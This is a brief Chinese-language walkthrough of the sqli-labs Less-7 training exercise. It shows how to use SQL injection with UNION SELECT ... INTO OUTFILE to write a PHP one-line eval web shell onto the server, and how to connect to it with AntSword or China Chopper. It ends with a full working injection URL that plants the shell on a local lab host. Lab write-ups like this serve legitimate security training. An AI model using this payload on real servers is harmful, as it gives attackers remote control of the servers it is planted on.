一句话木马

一句话木马

前言：题目取自sqli-labs-master/Less-7
1.首先判断闭合，对于我这样的小白实在试不出来，我们可以用burpsuit爆破，也可以直接看源码，总之得到闭合’))
2.联合注入不行，报错注入不行，于是根据题意哈哈然后就一句话木马吧
3.一句话木马原理就是可以上传一个文件，然后得到服务器的控制权限
4. a.木马写法<?php @eval("$_POST['key']")?>
 b.这是一个PHP代码，<?php 中间php代码 ?>
 c.@eval是不显示错误，就是你代码出错也不显示错误
 d.$_POST是php内置的数组变量，你通过post方式传入的数据都会存进去
5.传入方式用联合的方式写进去
union select 1,2,<?php @eval($_POST[‘key’])?;> into outfile "服务器你要写入的地方"联合位数写对

获取服务器网站地址，可以用报错注入的方式，在前面几关
@@datadir 数据路径
@@basedir Mysql安装路径

6.接下来用antsword,中国菜刀连接就可以了http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1, "<?php @eval($_POST['ring']); ?>",3 into outfile "D://phpstudy_pro//WWW//ring.php" --+